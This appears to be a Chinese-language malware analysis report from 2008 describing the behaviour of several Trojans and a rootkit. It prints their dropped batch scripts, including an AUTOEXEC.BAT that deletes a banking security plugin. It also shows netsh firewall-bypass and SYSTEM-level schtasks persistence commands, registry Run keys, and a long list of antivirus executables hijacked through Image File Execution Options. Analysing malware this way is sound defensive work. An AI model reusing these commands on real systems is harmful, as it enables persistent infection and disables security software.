程式名稱
c:\windows\system32\
cmd.exe
//第 1 次 cmd.exe 執行
cmd.exe 的行為分析 (第 1 次) :
建立新的處理程序 :
路徑
程式名稱
c:\windows\system32\
zsmscc071001.exe
啟動參數
/c c:\downf.bat
啟動參數
i
刪除檔案 :
C:\downf.bat
cmd.exe 的行為分析 (第 2 次) :
刪除檔案 :
%Patch%\cao.exe //%Patch%對應檔案 cao.exe 的相對位置
C:\nmDelm.bat
zsmscc071001.exe 的行為分析 :
建立檔案 :
C:\WINDOWS\system32\zsmscc32.dll
寫入檔案 :
C:\WINDOWS\zsmscc16.ini
C:\WINDOWS\system32\zsmscc32.dll
建立新的處理程序 :
路徑
c:\program files\internet explorer\
程式名稱
iexplore.exe
啟動參數
存取其它處理程序的記憶體 :
c:\program files\internet explorer\iexplore.exe
在其他處理程序中建立執行緒 :
c:\program files\internet explorer\iexplore.exe
iexplore.exe 的行為分析 :
未有可疑行為
附加資訊 :
其他行為 :
1. 網路連線行為
nmDelm.bat 的檔案內容 :
:try
del "C:\Documents and Settings\VMware\桌面\tavo\cao_vcc_kitman231\cao.exe"
if exist "C:\Documents and Settings\VMware\桌面
\tavo\cao_vcc_kitman231\cao.exe" goto try
del %0
downf.bat 的檔案內容 :
"C:\WINDOWS\system32\zsmscc071001.exe" i
del %0
分析結果 :
病毒類型 : Trojan
病毒檔案名:Trojan2008.12.24@002
回到第一頁
first.exe 的分析報告
一般資訊 :
分析日期 : 2008-12-10
可執行 : 是
檔案類型 : EXE
上傳者 : kitman231
分析者 : integear
樣本骨幹圖 :
first.exe
└ delme.bat
└ hgcheck.exe
first.exe 的行為分析 :
建立檔案 :
C :\Documents and Settings\[User Name]\delme.bat //生成物
C :\Windows\System32\hgcheck.exe //生成物
first.exe //母體
建立新的處理程序 :
first.exe //母體
下載物 :
http://www.Msnupdateslive.com/download/hgcheck.jpg //無任何特殊行為,為加殼
檔
分析結果 :
病毒類型 : Trojan-Downloader
病毒檔案名:Trojan2008.12.24@003
回到第一頁
hgcheck.exe 的分析報告
一般資訊 :
分析日期 : 2008-12-10
可執行 : 是
檔案類型 : EXE
上傳者 : kitman231
分析者 : integear
樣本骨幹圖 :
hgcheck.exe
└ svchost.exe
hgcheck.exe 的行為分析 :
建立檔案 :
hgcheckt.exe //母體
svchost.exe //生成物
建立新的處理程序 :
hgcheckt.exe //母體
備註 :
有不明顯的下載行為.
分析結果 :
病毒類型 : Trojan-Downloader
病毒檔案名:Trojan2008.12.24@004
回到第一頁
kl.exe 的分析報告
一般資訊 :
分析日期 : 2008-12-03
可執行 : 是
檔案類型 : EXE (Packed With ASProtect)
上傳者 : kitman231
分析者 : 000110
樣本骨幹圖 :
kl.exe
├ netsh.exe
├ schtasks.exe
├ reg.exe (第 1 次執行)
├ reg.exe (第 2 次執行)
└ reg.exe (第 3 次執行)
kl.exe 的行為分析 :
刪除檔案 :
C:\AUTOEXEC.BAT //危險行為, AUTOEXEC.BAT 是系統重要檔案
建立檔案 :
C:\windows\system\win.exe
c:\remove\remove.CMD
c:\autoexec.bat
C:\Windows\System32\Gbpsv.exe
C:\remove\psexec.exe
C:\remove\pskill.exe
C:\remove\SetACL.exe
C:\remove\movefile.exe
C:\remove\mata.CMD
C:\remove\deleta.CMD
C:\remove\removeGB.CMD
C:\remove\setreg.CMD
C:\remove\clngbuster.reg
C:\wscntfy.dat
C:\WINDOWS\system32\REGISTRANDO_007.txt
寫入檔案 :
C:\WINDOWS\system\win.exe
C:\remove\remove.CMD
C:\autoexec.bat
C:\WINDOWS\system32\Gbpsv.exe
C:\remove\psexec.exe
C:\remove\pskill.exe
C:\remove\SetACL.exe
C:\remove\movefile.exe
C:\remove\mata.CMD
C:\remove\deleta.CMD
C:\remove\removeGB.CMD
C:\remove\setreg.CMD
C:\remove\clngbuster.reg
設定登錄資料 :
路徑
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\C
urrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\C
urrentVersion\Run\
//每次系統啟動時將執行指定的程式
建立新的處理程序 :
路徑
c:\windows\system32\
程式名稱
netsh.exe
名稱
Window
s32
Gbpsv.e
xe
數值
C:\windows\system\wi
n.exe
C:\Windows\System32\
Gbpsv.exe
啟動參數
firewall add allowedprogram
C:\windows\system\win.exe RPCCC
//透過 netsh.exe 建立允許規則突破 Winodws 內建防火牆
c:\windows\system32\
schtasks.exe
/create /tn startt /tr c:\autoexec.bat /sc
onstart /ru system
//透過 schtasks.exe 建立排程工作
c:\windows\system32\
reg.exe
add
"HKCU\Software\Sysinternals\PsExec" /v
EulaAccepted /t REG_DWORD /d
"0x00000001" /f
c:\windows\system32\
reg.exe
add "HKCU\Software\Sysinternals\PsKill"
/v EulaAccepted /t REG_DWORD /d
"0x00000001" /f
c:\windows\system32\
reg.exe
add
"HKCU\Software\Sysinternals\Movefile"
/v EulaAccepted /t REG_DWORD /d
"0x00000001" /f
schtasks.exe 的行為分析 :
建立檔案 :
C:\WINDOWS\Tasks\startt.job
寫入檔案 :
C:\WINDOWS\Tasks\startt.job
netsh.exe 的行為分析 :
設定登錄資料 :
路徑
名稱
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services win.exe
\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Au
thorizedApplications\List\C:\WINDOWS\system\
數值
C:\WINDOWS\syste
m\win.exe:*:Enabl
ed:RPCCC
reg.exe 的行為分析 (第 1 次執行) :
設定登錄資料 :
路徑
HKCU\Software\Sysinternals\PsExec
名稱
EulaAccepted
數值
0x00000001
reg.exe 的行為分析 (第 2 次執行) :
設定登錄資料 :
路徑
HKCU\Software\Sysinternals\PsKill
名稱
EulaAccepted
數值
0x00000001
reg.exe 的行為分析 (第 3 次執行) :
設定登錄資料 :
路徑
HKCU\Software\Sysinternals\Movefile
名稱
EulaAccepted
數值
0x00000001
附加資訊 :
其他行為 : 無
AUTOEXEC.BAT 的檔案內容 :
@echo off
cd\
del/s/q c:\windows\downlo~1\gb*.*
attrib -h -r -s "C:\Arquivos de programas\GbPlugin\*.exe" /s/q
rd /s/q "C:\Arquivos de programas\GbPlugin\*.exe"
del/s/q c:\windows\downlo~1\*.g??
del/s/q c:\windows\downlo~1\g*.*
del/s/q c:\arquiv~1\GbPlugin\g*.*
del/s/q c:\arquiv~1\GbPlugin\GbpSv.exe
del/s/q c:\arquiv~1\GbPlugin\gbiehcef.DLL
del/s/q c:\arquiv~1\GbPlugin\gbiehabn.dll
del/s/q c:\arquiv~1\GbPlugin\gbieh.dll
del/s/q c:\arquiv~1\GbPlugin\Cef.gpc
del/s/q c:\arquiv~1\GbPlugin\Bb.gpc
del/s/q c:\arquiv~1\GbPlugin\*.gmd
del/s/q c:\arquiv~1\GbPlugin\*.exe
del/s/q c:\arquiv~1\GbPlugin\*.dll
del/s/q c:\arquiv~1\Scpad\*.dll
del/s/q c:\arquiv~1\Scpad\*.bin
del/s/q c:\arquiv~1\GbPlugin\*.gmd
del/s/q c:\arquiv~1\GbPlugin\*.gpc
del/s/q c:\arquiv~1\GbPlugin\*.gmd
@echo.
^z
startt.job 的檔案內容 :
在系統啟動時執行 c:\autoexec.bat
分析結果 :
病毒類型 : Trojan-Agent
病毒檔案名:Trojan2008.12.24@005
回到第一頁
securefileshredderinstallerdualen.exe 的分析報告
一般資訊 :
分析日期 : 2008-12-03
可執行 : 是
檔案類型 : EXE (安裝程式)
上傳者 : kitman231
分析者 : 000110
樣本骨幹圖 :
securefileshredderinstallerdualen.exe
└ sfssetupdual.exe (第 1 次執行)
└ sfssetupdual.tmp (位於 is-3i6ur.tmp\ 資料夾下)
└ sfssetupdual.exe (第 2 次執行)
└ sfssetupdual.tmp (位於 is-0r26f.tmp\ 資料夾下)
├ taskkill.exe
├ regsvr32.exe
├ fileshredder.exe
└ filemonitor.exe
securefileshredderinstallerdualen.exe 的行為分析 :
設定登錄資料 :
路徑
名稱
數值
HKEY_LOCAL_MACHINE\SOFTWARE\Micro SecureFileShred %Patch%\SecureFileShredderInst
soft\Windows\CurrentVersion\Run\
derDownloader allerDualEn_wc_kitman231.exe*
*
: %Patch% 對應檔案 SecureFileShredderInstallerDualEn_wc_kitman231.exe 的相對位置
建立檔案 :
C:\Documents and Settings\[User Name]\Local Settings\Temporary Internet
Files\Content.IE5\5YNF88C6\SecureFileShredderSetupDualEn[1].exe //從互聯網下
載
C:\Documents and Settings\[User Name]\Local
Settings\Temp\FileShredderSetup\SFSSetupDual.exe
寫入檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\FileShredderSetup\SFSSetupDual.exe
建立資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\FileShredderSetup
刪除登錄資料 :
路徑
名稱
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVer SecureFileShredderDownl
sion\Run\
oader
建立新的處理程序 :
路徑
c:\documents and settings\[User Name]\local
settings\temp\fileshreddersetup\
程式名稱
sfssetupdual.exe
啟動參數
/tid=6200
sfssetupdual.exe 的行為分析 (第 1 次執行) :
建立資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp
建立檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp
寫入檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp
建立新的處理程序 :
路徑
c:\documents and
settings\[User Name]\local
settings\temp\is-3i6ur.tmp\
程式名稱
sfssetupdual.tmp
啟動參數
/SL5="$602E8,1173147,53248,C:\DOCUME
~1\[User
Name]\LOCALS~1\Temp\FileShredderSetup
\SFSSetupDual.exe" /tid=6200
sfssetupdual.tmp 的行為分析 :
建立資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp
建立檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll
寫入檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll
建立新的處理程序 :
路徑
c:\documents and
settings\[User Name]\local
settings\temp\fileshredders
etup\
程式名稱
啟動參數
sfssetupdual.e /verysilent /norestart
xe
/sl5="$602e8,1173147,53248,c:\docume~1\[Use
r
Name]\locals~1\temp\fileshreddersetup\sfssetu
pdual.exe" /tid=6200
刪除檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll
刪除資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp
sfssetupdual.exe 的行為分析 (第 2 次執行) :
刪除檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-0R26F.tmp\SFSSetupDual.tmp
建立資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp
建立檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-0R26F.tmp\SFSSetupDual.tmp
刪除資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp
建立新的處理程序 :
路徑
程式名稱
c:\documents and sfssetupdual.tmp
settings\[User
Name]\local
settings\temp\is-0
r26f.tmp\
啟動參數
/SL5="$702E8,1173147,53248,C:\DOCUME~1\[User
Name]\LOCALS~1\Temp\FileShredderSetup\SFSSetupD
ual.exe" /verysilent /norestart
/sl5="$602e8,1173147,53248,c:\docume~1\[User
Name]\locals~1\temp\fileshredderset
sfssetupdual.tmp 的行為分析 :
建立資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp
建立檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll
C:\Program Files\SecureFileShredder\unins000.dat
C:\Program Files\SecureFileShredder\is-3NR36.tmp
C:\Program Files\SecureFileShredder\unins000.exe
C:\Program Files\SecureFileShredder\is-3JKNR.tmp
C:\Program Files\SecureFileShredder\FileShredder.exe
C:\Program Files\SecureFileShredder\is-SOE7C.tmp
C:\Program Files\SecureFileShredder\FileMonitor.exe
C:\Program Files\SecureFileShredder\is-11JU9.tmp
C:\Program Files\SecureFileShredder\FileShredder.xml
C:\Program Files\SecureFileShredder\is-QMNV3.tmp
C:\Program Files\SecureFileShredder\securefileshredder.url
C:\Program Files\SecureFileShredder\is-9QPAD.tmp
C:\Program Files\SecureFileShredder\FileShredder.ico
C:\Program Files\SecureFileShredder\is-82A76.tmp
C:\Program Files\SecureFileShredder\ExtSFS.dll
C:\Program Files\SecureFileShredder\is-EKPCD.tmp
C:\Program Files\SecureFileShredder\FShellEx.dll
C:\Program Files\SecureFileShredder\is-0EIGP.tmp
C:\Program Files\SecureFileShredder\SafeOper.dll
C:\Program Files\SecureFileShredder\is-9KQPP.tmp
C:\Program Files\SecureFileShredder\ExpBtn.dll
C:\Documents and Settings\All Users\「開始」功能表\程式集
\SecureFileShredder\Launch SecureFileShredder.lnk
C:\Documents and Settings\All Users\「開始」功能表\程式集
\SecureFileShredder\SecureFileShredder Home Page.lnk
C:\Documents and Settings\All Users\桌面\Secure FileShredder.lnk
C:\Documents and Settings\[User Name]\Application Data\Microsoft\Internet
Explorer\Quick Launch\SecureFileShredder.lnk
寫入檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll
C:\Program Files\SecureFileShredder\is-3NR36.tmp
C:\Program Files\SecureFileShredder\is-3JKNR.tmp
C:\Program Files\SecureFileShredder\is-SOE7C.tmp
C:\Program Files\SecureFileShredder\is-11JU9.tmp
C:\Program Files\SecureFileShredder\is-QMNV3.tmp
C:\Program Files\SecureFileShredder\is-9QPAD.tmp
C:\Program Files\SecureFileShredder\is-82A76.tmp
C:\Program Files\SecureFileShredder\is-EKPCD.tmp
C:\Program Files\SecureFileShredder\is-0EIGP.tmp
C:\Documents and Settings\All Users\「開始」功能表\程式集
\SecureFileShredder\Launch SecureFileShredder.lnk
C:\Documents and Settings\All Users\「開始」功能表\程式集
\SecureFileShredder\SecureFileShredder Home Page.lnk
C:\Documents and Settings\All Users\桌面\Secure FileShredder.lnk
C:\Documents and Settings\[User Name]\Application Data\Microsoft\Internet
Explorer\Quick Launch\SecureFileShredder.lnk
C:\Program Files\SecureFileShredder\unins000.dat
設定登錄資料 :
路徑
HKEY_LOCAL_MACHINE\SOFTWARE\Micros
oft\Windows\CurrentVersion\Shell
Extensions\Approved\
HKEY_LOCAL_MACHINE\SOFTWARE\Micros
oft\Windows\CurrentVersion\Shell
Extensions\Approved\
//以上 2 項變更將會變更右鍵功能表
HKEY_LOCAL_MACHINE\SOFTWARE\Micros
oft\Windows\CurrentVersion\Run\
名稱
{FEAED91E-FB2D-4842-85
93-CB82B1A4222D}
數值
SecureFileShredder
shell extention
{D99C619E-00DE-44bc-88
70-D3030D4708B4}
SecureFileShredder
shell extention
SecureFileShredder
HKEY_LOCAL_MACHINE\SOFTWARE\Micros
oft\Windows\CurrentVersion\Run\
FileMonitor
C:\Program
Files\SecureFileShred
der\FileShredder.exe
C:\Program
Files\SecureFileShred
der\FileMonitor.exe
//以上 2 項變更將會導致每次系統啟動時執行指定程式
刪除檔案 :
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp
C:\Documents and Settings\[User Name]\Local
Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll
刪除資料夾 :
C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp
建立新的處理程序 :
路徑
c:\windows\system32\
c:\windows\system32\
c:\windows\system32\
程式名稱
taskkill.exe
taskkill.exe
regsvr32.exe
c:\windows\system32\
regsvr32.exe
c:\windows\system32\
regsvr32.exe
c:\windows\system32\
regsvr32.exe
c:\program
fileshredder.exe
files\securefileshredder\
c:\program
filemonitor.exe
files\securefileshredder\
啟動參數
/F /IM FileShredder.exe
/F /IM FileMonitor.exe
/s "C:\Program
Files\SecureFileShredder\ExtSFS.dll"
/s "C:\Program
Files\SecureFileShredder\FShellEx.dll"
/s "C:\Program
Files\SecureFileShredder\SafeOper.dll"
/s "C:\Program
Files\SecureFileShredder\ExpBtn.dll"
taskkill.exe 的行為分析 :
寫入檔案
\Device\NamedPipe\lsarpc
//從管道尋找執行中的應用程式
regsvr32.exe 的行為分析 :
建立登錄機碼 :
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\SFSSh
ellExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandler
s\SFSShellExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00A
A002F954E}\shellex\ContextMenuHandlers\SFSShellExtension
設定登錄資料 :
路徑
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*
\shellex\ContextMenuHandlers\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\D
irectory\shellex\ContextMenuHandlers\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\C
LSID\{645FF040-5081-101B-9F08-00AA002F95
4E}\shellex\ContextMenuHandlers\
//以上 3 項變更將會變更右鍵功能表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Internet Explorer\Toolbar\
名稱
數值
SFSShellExtension {FEAED91E-FB2D-4842-859
3-CB82B1A4222D}
SFSShellExtension {FEAED91E-FB2D-4842-859
3-CB82B1A4222D}
SFSShellExtension {7915AA00-43C5-432d-800
D-6F3FD2590F12}
{D99C619E-00DE44bc-8870-D3030
D4708B4}
//以上 1 項變更將會變更 Internet Explorer 的工具列
附加資訊 :
其他行為 :
1. c:\windows\system32\svchost.exe
寫入檔案 : \Device\NamedPipe\lsarpc
//Taskkill.exe 的後繼動作
2. c:\windows\system32\wbem\wmiprvse.exe
寫入檔案 : \Device\NamedPipe\lsarpc //Taskkill.exe 的後繼動作
分析結果 :
病毒類型 : Trojan-Downloader
病毒檔案名:Trojan2008.12.24@006
回到第一頁
setup.exe 的分析報告
一般資訊 :
分析日期 : 2008-12-05
可執行 : 是
檔案類型 : EXE
上傳者 : integear
分析者 : integear
樣本骨幹圖 :
setup.exe //母體
└ zuhrn0.cmd //生成物
setup.exe 的行為分析 :
建立檔案 :
setup.exe //母體
zuhrn0.cmd //生成物
建立新的處理程序 :
setup.exe //母體
備註:
有不明下載行為
分析結果 :
病毒類型 : Trojan-Downloader
病毒檔案名:Trojan2008.12.24@007
回到第一頁
樣本名:w32time.dll
類型:Trojan-KillAV-Rootkit
病毒檔案名:Trojan2008.12.24@008
上傳者:kitman231
分析者:asusp4b533
分析日期:20081206
分析工具:ThreatExpert
可執行:是
建立檔案:
c:\autorun.inf
%Temp%\242687
%Temp%\345234.txt
%Temp%\345328
c:\system.dll
%System%\appwinproc.dll
%System%\Nskhelper2.sys
%System%\NsPass0.sys
%System%\NsPass1.sys
%System%\NsPass2.sys
%System%\NsPass3.sys
%System%\NsPass4.sys
程序及記憶體行為:
遠端建立記憶體空間: 建立於->%System%\svchost.exe
DLL 遠端注入: %System%\appwinproc.dll ->%Windir%\explorer.exe
->%ProgramFiles%\messenger\msmsgs.exe
->%Windir%\dns\sdnsmain.exe
->%System%\svchost.exe
w32time.dll
->generic host process filename
->%System%\svchost.exe
驅動程式載入: %System%\nskhelper2.sys
%System%\nspass0.sys
%System%\nspass1.sys
%System%\nspass2.sys
%System%\nspass3.sys
%System%\nspass4.sys
登錄檔建立行為:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\360safe.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\360safebox.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\360tray.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ACKWIN32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ANTI-TROJAN.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\anti.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\antivir.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\atrack.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AUTODOWN.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVCONSOL.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVE32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVGCTRL.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\avk.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVKSERV.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\avp.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVPUPD.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVSCHED32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\avsynmgr.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\AVWIN95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\avxonsol.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\BLACKD.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\BLACKICE.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CCenter.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CFIADMIN.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CFIAUDIT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CFIND.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\cfinet.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\cfinet32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CLAW95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CLAW95CT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CLEANER.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\CLEANER3.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DAVPFW.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\dbg.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\debu.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DV95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DV95_O.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DVP95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ECENGINE.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\EFINET32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ESAFE.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ESPWATCH.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\explorewclass.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\F-AGNT95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\F-PROT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\f-prot95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\f-stopw.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\FINDVIRU.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\fir.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\fp-win.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\FRW.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\IAMAPP.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\IAMSERV.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\IBMASN.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\IBMAVSP.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ice.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\IceSword.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ICLOAD95.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ICLOADNT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ICMOON.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\ICSSUPPNT.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\iom.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\iomon98.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\JED.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\Kabackreport.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\Kasmain.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\kav32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\kavstart.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\kissvc.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\KPFW32.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\kpfwsvc.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\KPPMain.exe
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\KRF.exe
